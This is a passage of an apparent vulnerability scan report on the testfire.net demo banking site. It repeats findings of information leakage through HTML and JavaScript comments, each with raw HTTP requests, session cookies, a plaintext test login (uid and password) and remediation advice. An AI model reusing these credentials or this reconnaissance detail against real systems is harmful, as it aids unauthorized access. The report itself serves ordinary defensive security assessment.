Origin: http://demo.testfire.net:8080
Upgrade-Insecure-Requests: 1
Referer: http://demo.testfire.net:8080/login.jsp
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Content-Length: 42
Content-Type: application/x-www-form-urlencoded

uid=CHSuser&passw=Passwor1&btnSubmit=Login

Remediation:
Remove comments which have sensitive information about the
application. Some of the comments may be exposed to the user and
affect the security posture of the application.

74 Information leakage via 5.0 Medium Fail URL: http://demo.testfire.net:8080/index.jsp


HTML or JavaScript Port: tcp/8080
comments
While adding general comments is very useful, some programmers
tend to leave important data, such as: filenames related to the web
application, old links or links which were not meant to be browsed by
users, old code fragments, etc.

An attacker who finds these comments can map the application's


structure and files, expose hidden parts of the site, and study the
fragments of code to reverse engineer the application, which may help
develop further attacks against the site.

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 345 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status

CVSSv2: AV:N/AC:L/Au:N/C:P/I:N/A:N
Service: http

Reference:
https://cwe.mitre.org/data/definitions/615.html

Evidence:
DetectionDetails: HTML or Javascript comments found
GET - http://demo.testfire.net:8080/index.jsp
7 HTML Comment(s) found
<!-- BEGIN HEADER -->
<!-- END FOOTER -->
<!-- TOC BEGIN -->
<!-- END HEADER -->
<!-- TOC END -->
<!-- BEGIN FOOTER -->
<!-- Keywords:Altoro Mutual, online banking, banking, checking,
savings, accounts -->
Request: GET http://demo.testfire.net:8080/index.jsp HTTP/1.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Cookie: JSESSIONID=03939398EA63CCAEE93295DC28E42282

Remediation:
Remove comments which have sensitive information about the
application. Some of the comments may be exposed to the user and
affect the security posture of the application.

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 346 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status

75 Information leakage via 5.0 Medium Fail URL: https://demo.testfire.net:8443/


HTML or JavaScript Port: tcp/8443
comments
While adding general comments is very useful, some programmers
tend to leave important data, such as: filenames related to the web
application, old links or links which were not meant to be browsed by
users, old code fragments, etc.

An attacker who finds these comments can map the application's


structure and files, expose hidden parts of the site, and study the
fragments of code to reverse engineer the application, which may help
develop further attacks against the site.

CVSSv2: AV:N/AC:L/Au:N/C:P/I:N/A:N
Service: https

Reference:
https://cwe.mitre.org/data/definitions/615.html

Evidence:
DetectionDetails: HTML or Javascript comments found
GET - https://demo.testfire.net:8443/
7 HTML Comment(s) found
<!-- BEGIN HEADER -->
<!-- END FOOTER -->
<!-- TOC BEGIN -->
<!-- END HEADER -->
<!-- TOC END -->
<!-- BEGIN FOOTER -->
<!-- Keywords:Altoro Mutual, online banking, banking, checking,

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 347 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
savings, accounts -->
Request: GET https://demo.testfire.net:8443/ HTTP/1.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36

Remediation:
Remove comments which have sensitive information about the
application. Some of the comments may be exposed to the user and
affect the security posture of the application.

76 Information leakage via 5.0 Medium Fail URL: https://demo.testfire.net:8443/feedback.jsp


HTML or JavaScript Port: tcp/8443
comments
While adding general comments is very useful, some programmers
tend to leave important data, such as: filenames related to the web
application, old links or links which were not meant to be browsed by
users, old code fragments, etc.

An attacker who finds these comments can map the application's


structure and files, expose hidden parts of the site, and study the
fragments of code to reverse engineer the application, which may help
develop further attacks against the site.

CVSSv2: AV:N/AC:L/Au:N/C:P/I:N/A:N
Service: https

Reference:
https://cwe.mitre.org/data/definitions/615.html

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 348 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status

Evidence:
DetectionDetails: HTML or Javascript comments found
GET - https://demo.testfire.net:8443/feedback.jsp
7 HTML Comment(s) found
<!-- BEGIN HEADER -->
<!-- END FOOTER -->
<!-- TOC BEGIN -->
<!-- END HEADER -->
<!-- TOC END -->
<!-- BEGIN FOOTER -->
<!-- Dave- Hard code this into the final script - Possible security
problem.
Re-generated every Tuesday and old files are saved
to .bak format at L:\backup\website\oldfiles --->
Request: GET https://demo.testfire.net:8443/feedback.jsp HTTP/1.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Cookie: JSESSIONID=44C815873649B1433E310F19F9B9450B

Remediation:
Remove comments which have sensitive information about the
application. Some of the comments may be exposed to the user and
affect the security posture of the application.

77 Information leakage via 5.0 Medium Fail URL: http://65.61.137.117/index.jsp?content=inside_contact.htm


HTML or JavaScript Port: tcp/80
comments
While adding general comments is very useful, some programmers

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 349 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
tend to leave important data, such as: filenames related to the web
application, old links or links which were not meant to be browsed by
users, old code fragments, etc.

An attacker who finds these comments can map the application's


structure and files, expose hidden parts of the site, and study the
fragments of code to reverse engineer the application, which may help
develop further attacks against the site.

CVSSv2: AV:N/AC:L/Au:N/C:P/I:N/A:N
Service: http

Reference:
https://cwe.mitre.org/data/definitions/615.html

Evidence:
DetectionDetails: HTML or Javascript comments found
GET - http://65.61.137.117/index.jsp?content=inside_contact.htm
7 HTML Comment(s) found
<!-- BEGIN HEADER -->
<!-- END FOOTER -->
<!-- TOC BEGIN -->
<!-- END HEADER -->
<!-- TOC END -->
<!-- BEGIN FOOTER -->
<!-- Keywords:Altoro Mutual, online banking, contact information,
subscriptions -->
Request: GET
http://65.61.137.117/index.jsp?content=inside_contact.htm HTTP/1.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 350 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
Cookie: JSESSIONID=7DEA7694E36255C4C48824F9A0DE4E13

Remediation:
Remove comments which have sensitive information about the
application. Some of the comments may be exposed to the user and
affect the security posture of the application.

78 Information leakage via 5.0 Medium Fail URL: https://65.61.137.117:8443/doLogin


HTML or JavaScript Port: tcp/8443
comments
While adding general comments is very useful, some programmers
tend to leave important data, such as: filenames related to the web
application, old links or links which were not meant to be browsed by
users, old code fragments, etc.

An attacker who finds these comments can map the application's


structure and files, expose hidden parts of the site, and study the
fragments of code to reverse engineer the application, which may help
develop further attacks against the site.

CVSSv2: AV:N/AC:L/Au:N/C:P/I:N/A:N
Service: https

Reference:
https://cwe.mitre.org/data/definitions/615.html

Evidence:
DetectionDetails: HTML or Javascript comments found
POST - https://65.61.137.117:8443/doLogin

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 351 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
Potentially sensitive comments found
"admin" found in
<!-- To get the latest admin login, please contact SiteOps at 415-555-
6159 -->

7 HTML Comment(s) found


<!-- BEGIN HEADER -->
<!-- END FOOTER -->
<!-- TOC BEGIN -->
<!-- END HEADER -->
<!-- TOC END -->
<!-- BEGIN FOOTER -->
<!-- To get the latest admin login, please contact SiteOps at 415-555-
6159 -->
Request: POST https://65.61.137.117:8443/doLogin HTTP/1.1
Cookie: JSESSIONID=9B8C68C14BB9B053BB189485F1F888A4
Origin: https://65.61.137.117:8443
Upgrade-Insecure-Requests: 1
Referer: https://65.61.137.117:8443/login.jsp
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Content-Length: 42
Content-Type: application/x-www-form-urlencoded

uid=CHSuser&passw=Passwor1&btnSubmit=Login

Remediation:
Remove comments which have sensitive information about the
application. Some of the comments may be exposed to the user and
affect the security posture of the application.

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 352 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status

79 Information leakage via 5.0 Medium Fail URL: https://65.61.137.117:8443/index.jsp


HTML or JavaScript Port: tcp/8443
comments
While adding general comments is very useful, some programmers
tend to leave important data, such as: filenames related to the web
application, old links or links which were not meant to be browsed by
users, old code fragments, etc.

An attacker who finds these comments can map the application's


structure and files, expose hidden parts of the site, and study the
fragments of code to reverse engineer the application, which may help
develop further attacks against the site.

CVSSv2: AV:N/AC:L/Au:N/C:P/I:N/A:N
Service: https

Reference:
https://cwe.mitre.org/data/definitions/615.html

Evidence:
DetectionDetails: HTML or Javascript comments found
GET - https://65.61.137.117:8443/index.jsp
7 HTML Comment(s) found
<!-- BEGIN HEADER -->
<!-- END FOOTER -->
<!-- TOC BEGIN -->
<!-- END HEADER -->
<!-- TOC END -->
<!-- BEGIN FOOTER -->
<!-- Keywords:Altoro Mutual, online banking, banking, checking,
savings, accounts -->
Request: GET https://65.61.137.117:8443/index.jsp HTTP/1.1

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 353 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Cookie: JSESSIONID=9B8C68C14BB9B053BB189485F1F888A4

Remediation:
Remove comments which have sensitive information about the
application. Some of the comments may be exposed to the user and
affect the security posture of the application.

80 Information leakage via 5.0 Medium Fail URL: https://65.61.137.117:8443/feedback.jsp


HTML or JavaScript Port: tcp/8443
comments
While adding general comments is very useful, some programmers
tend to leave important data, such as: filenames related to the web
application, old links or links which were not meant to be browsed by
users, old code fragments, etc.

An attacker who finds these comments can map the application's


structure and files, expose hidden parts of the site, and study the
fragments of code to reverse engineer the application, which may help
develop further attacks against the site.

CVSSv2: AV:N/AC:L/Au:N/C:P/I:N/A:N
Service: https

Reference:
https://cwe.mitre.org/data/definitions/615.html

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 354 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
Evidence:
DetectionDetails: HTML or Javascript comments found
GET - https://65.61.137.117:8443/feedback.jsp
7 HTML Comment(s) found
<!-- BEGIN HEADER -->
<!-- END FOOTER -->
<!-- TOC BEGIN -->
<!-- END HEADER -->
<!-- TOC END -->
<!-- BEGIN FOOTER -->
<!-- Dave- Hard code this into the final script - Possible security
problem.
Re-generated every Tuesday and old files are saved
to .bak format at L:\backup\website\oldfiles --->
Request: GET https://65.61.137.117:8443/feedback.jsp HTTP/1.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Cookie: JSESSIONID=9B8C68C14BB9B053BB189485F1F888A4

Remediation:
Remove comments which have sensitive information about the
application. Some of the comments may be exposed to the user and
affect the security posture of the application.

81 Information leakage via 5.0 Medium Fail URL: http://demo.testfire.net/login.jsp


HTML or JavaScript Port: tcp/80
comments
While adding general comments is very useful, some programmers

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 355 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
tend to leave important data, such as: filenames related to the web
application, old links or links which were not meant to be browsed by
users, old code fragments, etc.

An attacker who finds these comments can map the application's


structure and files, expose hidden parts of the site, and study the
fragments of code to reverse engineer the application, which may help
develop further attacks against the site.

CVSSv2: AV:N/AC:L/Au:N/C:P/I:N/A:N
Service: http

Reference:
https://cwe.mitre.org/data/definitions/615.html

Evidence:
DetectionDetails: HTML or Javascript comments found
GET - http://demo.testfire.net/login.jsp
Potentially sensitive comments found
"admin" found in
<!-- To get the latest admin login, please contact SiteOps at 415-555-
6159 -->

7 HTML Comment(s) found


<!-- BEGIN HEADER -->
<!-- END FOOTER -->
<!-- TOC BEGIN -->
<!-- END HEADER -->
<!-- TOC END -->
<!-- BEGIN FOOTER -->
<!-- To get the latest admin login, please contact SiteOps at 415-555-
6159 -->

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 356 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
Request: GET http://demo.testfire.net/login.jsp HTTP/1.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Cookie: JSESSIONID=B95638AFC2EBB1AEEE06E0A48503002C

Remediation:
Remove comments which have sensitive information about the
application. Some of the comments may be exposed to the user and
affect the security posture of the application.

82 Information leakage via 5.0 Medium Fail URL: https://65.61.137.117/search.jsp?query=_WSETESTDATA


HTML or JavaScript Port: tcp/443
comments
While adding general comments is very useful, some programmers
tend to leave important data, such as: filenames related to the web
application, old links or links which were not meant to be browsed by
users, old code fragments, etc.

An attacker who finds these comments can map the application's


structure and files, expose hidden parts of the site, and study the
fragments of code to reverse engineer the application, which may help
develop further attacks against the site.

CVSSv2: AV:N/AC:L/Au:N/C:P/I:N/A:N
Service: https

Reference:
https://cwe.mitre.org/data/definitions/615.html

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 357 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status

Evidence:
DetectionDetails: HTML or Javascript comments found
GET - https://65.61.137.117/search.jsp?query=_WSETESTDATA
6 HTML Comment(s) found
<!-- BEGIN HEADER -->
<!-- END FOOTER -->
<!-- TOC BEGIN -->
<!-- END HEADER -->
<!-- TOC END -->
<!-- BEGIN FOOTER -->
Request: GET https://65.61.137.117/search.jsp?query=_WSETESTDATA
HTTP/1.1
Cookie: JSESSIONID=3804E3482E26BDF0C73231467A2AC9D4
Upgrade-Insecure-Requests: 1
Referer: https://65.61.137.117/
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36

Remediation:
Remove comments which have sensitive information about the
application. Some of the comments may be exposed to the user and
affect the security posture of the application.

83 Information leakage via 5.0 Medium Fail URL: http://65.61.137.117/index.jsp


HTML or JavaScript Port: tcp/80
comments
While adding general comments is very useful, some programmers
tend to leave important data, such as: filenames related to the web
application, old links or links which were not meant to be browsed by

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 358 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
users, old code fragments, etc.

An attacker who finds these comments can map the application's


structure and files, expose hidden parts of the site, and study the
fragments of code to reverse engineer the application, which may help
develop further attacks against the site.

CVSSv2: AV:N/AC:L/Au:N/C:P/I:N/A:N
Service: http

Reference:
https://cwe.mitre.org/data/definitions/615.html

Evidence:
DetectionDetails: HTML or Javascript comments found
GET - http://65.61.137.117/index.jsp
7 HTML Comment(s) found
<!-- BEGIN HEADER -->
<!-- END FOOTER -->
<!-- TOC BEGIN -->
<!-- END HEADER -->
<!-- TOC END -->
<!-- BEGIN FOOTER -->
<!-- Keywords:Altoro Mutual, online banking, banking, checking,
savings, accounts -->
Request: GET http://65.61.137.117/index.jsp HTTP/1.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Cookie: JSESSIONID=7DEA7694E36255C4C48824F9A0DE4E13

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 359 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status

Remediation:
Remove comments which have sensitive information about the
application. Some of the comments may be exposed to the user and
affect the security posture of the application.

84 Information leakage via 5.0 Medium Fail URL: http://65.61.137.117/


HTML or JavaScript Port: tcp/80
comments
While adding general comments is very useful, some programmers
tend to leave important data, such as: filenames related to the web
application, old links or links which were not meant to be browsed by
users, old code fragments, etc.

An attacker who finds these comments can map the application's


structure and files, expose hidden parts of the site, and study the
fragments of code to reverse engineer the application, which may help
develop further attacks against the site.

CVSSv2: AV:N/AC:L/Au:N/C:P/I:N/A:N
Service: http

Reference:
https://cwe.mitre.org/data/definitions/615.html

Evidence:
DetectionDetails: Limit Exceeded. 9 more item(s) were reported.
GET - http://65.61.137.117/index.jsp?content=personal.htm
GET - http://65.61.137.117/index.jsp?content=business.htm
GET - http://65.61.137.117/subscribe.jsp
POST - http://65.61.137.117/doSubscribe

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 360 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
GET - http://65.61.137.117/default.jsp?content=security.htm
GET - http://65.61.137.117/survey_questions.jsp
GET - http://65.61.137.117/survey_questions.jsp?step=a
GET - http://65.61.137.117/status_check.jsp
GET - http://65.61.137.117/swagger/index.html

Remediation:
Remove comments which have sensitive information about the
application. Some of the comments may be exposed to the user and
affect the security posture of the application.

85 Information leakage via 5.0 Medium Fail URL: http://65.61.137.117/disclaimer.htm?url=http://www.microsoft.


HTML or JavaScript com
comments Port: tcp/80

While adding general comments is very useful, some programmers


tend to leave important data, such as: filenames related to the web
application, old links or links which were not meant to be browsed by
users, old code fragments, etc.

An attacker who finds these comments can map the application's


structure and files, expose hidden parts of the site, and study the
fragments of code to reverse engineer the application, which may help
develop further attacks against the site.

CVSSv2: AV:N/AC:L/Au:N/C:P/I:N/A:N
Service: http

Reference:
https://cwe.mitre.org/data/definitions/615.html

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 361 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
Evidence:
DetectionDetails: HTML or Javascript comments found
GET -
http://65.61.137.117/disclaimer.htm?url=http://www.microsoft.com
1 Javascript Comment(s) found
// if redirection is in the application's domain, don't ask for
authorization
Request: GET
http://65.61.137.117/disclaimer.htm?url=http://www.microsoft.com
HTTP/1.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Cookie: JSESSIONID=7DEA7694E36255C4C48824F9A0DE4E13

Remediation:
Remove comments which have sensitive information about the
application. Some of the comments may be exposed to the user and
affect the security posture of the application.

86 Information leakage via 5.0 Medium Fail URL: https://demo.testfire.net/disclaimer.htm?url=http://www.micro


HTML or JavaScript soft.com
comments Port: tcp/443

While adding general comments is very useful, some programmers


tend to leave important data, such as: filenames related to the web
application, old links or links which were not meant to be browsed by
users, old code fragments, etc.

An attacker who finds these comments can map the application's


structure and files, expose hidden parts of the site, and study the

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 362 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
fragments of code to reverse engineer the application, which may help
develop further attacks against the site.

CVSSv2: AV:N/AC:L/Au:N/C:P/I:N/A:N
Service: https

Reference:
https://cwe.mitre.org/data/definitions/615.html

Evidence:
DetectionDetails: HTML or Javascript comments found
GET -
https://demo.testfire.net/disclaimer.htm?url=http://www.microsoft.com
1 Javascript Comment(s) found
// if redirection is in the application's domain, don't ask for
authorization
Request: GET
https://demo.testfire.net/disclaimer.htm?url=http://www.microsoft.com
HTTP/1.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Cookie: JSESSIONID=0565231311CE173563DB02789CEE78E3

Remediation:
Remove comments which have sensitive information about the
application. Some of the comments may be exposed to the user and
affect the security posture of the application.

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 363 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status

87 Information leakage via 5.0 Medium Fail URL: https://demo.testfire.net/feedback.jsp


HTML or JavaScript Port: tcp/443
comments
While adding general comments is very useful, some programmers
tend to leave important data, such as: filenames related to the web
application, old links or links which were not meant to be browsed by
users, old code fragments, etc.

An attacker who finds these comments can map the application's


structure and files, expose hidden parts of the site, and study the
fragments of code to reverse engineer the application, which may help
develop further attacks against the site.

CVSSv2: AV:N/AC:L/Au:N/C:P/I:N/A:N
Service: https

Reference:
https://cwe.mitre.org/data/definitions/615.html

Evidence:
DetectionDetails: HTML or Javascript comments found
GET - https://demo.testfire.net/feedback.jsp
7 HTML Comment(s) found
<!-- BEGIN HEADER -->
<!-- END FOOTER -->
<!-- TOC BEGIN -->
<!-- END HEADER -->
<!-- TOC END -->
<!-- BEGIN FOOTER -->
<!-- Dave- Hard code this into the final script - Possible security
problem.
Re-generated every Tuesday and old files are saved

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 364 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
to .bak format at L:\backup\website\oldfiles --->
Request: GET https://demo.testfire.net/feedback.jsp HTTP/1.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Cookie: JSESSIONID=0565231311CE173563DB02789CEE78E3

Remediation:
Remove comments which have sensitive information about the
application. Some of the comments may be exposed to the user and
affect the security posture of the application.

88 Information leakage via 5.0 Medium Fail URL: https://demo.testfire.net/doLogin


HTML or JavaScript Port: tcp/443
comments
While adding general comments is very useful, some programmers
tend to leave important data, such as: filenames related to the web
application, old links or links which were not meant to be browsed by
users, old code fragments, etc.

An attacker who finds these comments can map the application's


structure and files, expose hidden parts of the site, and study the
fragments of code to reverse engineer the application, which may help
develop further attacks against the site.

CVSSv2: AV:N/AC:L/Au:N/C:P/I:N/A:N
Service: https

Reference:

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 365 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
https://cwe.mitre.org/data/definitions/615.html

Evidence:
DetectionDetails: HTML or Javascript comments found
POST - https://demo.testfire.net/doLogin
Potentially sensitive comments found
"admin" found in
<!-- To get the latest admin login, please contact SiteOps at 415-555-
6159 -->

7 HTML Comment(s) found


<!-- BEGIN HEADER -->
<!-- END FOOTER -->
<!-- TOC BEGIN -->
<!-- END HEADER -->
<!-- TOC END -->
<!-- BEGIN FOOTER -->
<!-- To get the latest admin login, please contact SiteOps at 415-555-
6159 -->
Request: POST https://demo.testfire.net/doLogin HTTP/1.1
Cookie: JSESSIONID=0565231311CE173563DB02789CEE78E3
Origin: https://demo.testfire.net
Upgrade-Insecure-Requests: 1
Referer: https://demo.testfire.net/login.jsp
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Content-Length: 42
Content-Type: application/x-www-form-urlencoded

uid=CHSuser&passw=Passwor1&btnSubmit=Login

Remediation:
Remove comments which have sensitive information about the

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 366 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
application. Some of the comments may be exposed to the user and
affect the security posture of the application.

89 Information leakage via 5.0 Medium Fail URL: http://demo.testfire.net:8080/feedback.jsp


HTML or JavaScript Port: tcp/8080
comments
While adding general comments is very useful, some programmers
tend to leave important data, such as: filenames related to the web
application, old links or links which were not meant to be browsed by
users, old code fragments, etc.

An attacker who finds these comments can map the application's


